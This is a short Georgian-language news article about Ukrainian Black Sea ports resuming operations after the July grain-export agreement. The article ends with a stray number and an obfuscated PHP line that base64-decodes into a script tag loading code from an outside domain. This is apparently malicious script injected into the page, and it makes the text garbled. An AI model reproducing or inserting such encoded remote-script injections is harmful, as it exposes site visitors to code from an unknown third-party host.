celsiusi
ავერსი საქკაბელი
შავ ზღვაში უკრაინულმა პორტებმა მუშაობა განაახლეს. ამის შესახებ ნათქვამია უკრაინის სამხედრო-საზღვაო ძალების მიერ სოციალურ ქსელ „ფეისბუქში“ გავრცელებულ განცხადებაში.
 
განცხადების თანახმად, მარცვლეულის ექსპორტისთვის უკრაინული პორტების განბლოკვის შესახებ შეთანხმების ხელმოწერასთან დაკავშირებით, განახლდა მუშაობა ოდესის, ჩერნომორსკისა და იუჟნის პორტებში.
 
საზღვაო პორტებში ხომალდების შესვლა და გასვლა ქარავანის ფორმირების გზით მოხდება. უკრაინის სამხედრო-საზღვაო ძალების ცნობით, ხომალდებისთვის უსაფრთხო მარშრუტების განსაზღვრისთვის სამხედრო და სამოქალაქო სპეციალისტები მუშაობენ.
 
შეგახსენებთ, 22 ივლისს რუსეთმა და უკრაინამ, გაერო-სა და თურქეთთან ერთად, ხელი მოაწერეს შეთანხმებას, რომელმაც უნდა უზრუნველყოს უკრაინის შავი ზღვის პორტებიდან გემების უსაფრთხო მიმოსვლა მარცვლეულის ექსპორტისთვის.
539
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");